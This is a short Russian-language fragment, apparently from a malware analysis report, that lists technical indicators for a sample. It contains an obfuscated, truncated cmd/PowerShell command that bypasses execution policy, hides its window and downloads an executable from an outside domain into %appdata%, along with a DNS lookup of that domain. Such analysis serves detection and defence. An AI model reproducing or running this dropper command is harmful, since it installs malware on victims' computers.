Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^W^erShElL.Ex^E^ ^-^exe^C^u^tiON^PoLi^C^Y^ ^byP^asS -nOpRoFiL^e^ ^-^WIn^dO^wstyl^e^ ^hId^d^EN (^ne^w-o^B^J^e^c^t SY^StEm.NET.WeB^cl^IE^Nt).^DO^W^nloadF^Il^e(^'http://truthfore...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "P^O^W^erShElL.Ex^E^ ^-^exe^C^u^tiON^PoLi^C^Y^ ^byP^asS -nOpRoFiL^e^ ^-^WIn^dO^wstyl^e^ ^hId^d^EN (^ne^w-o^B^J^e^c^t SY^StEm.NET.WeB^cl^IE^Nt).^DO^W^nloadF^Il^e(^'http://truthfore...' (со скрытым окном)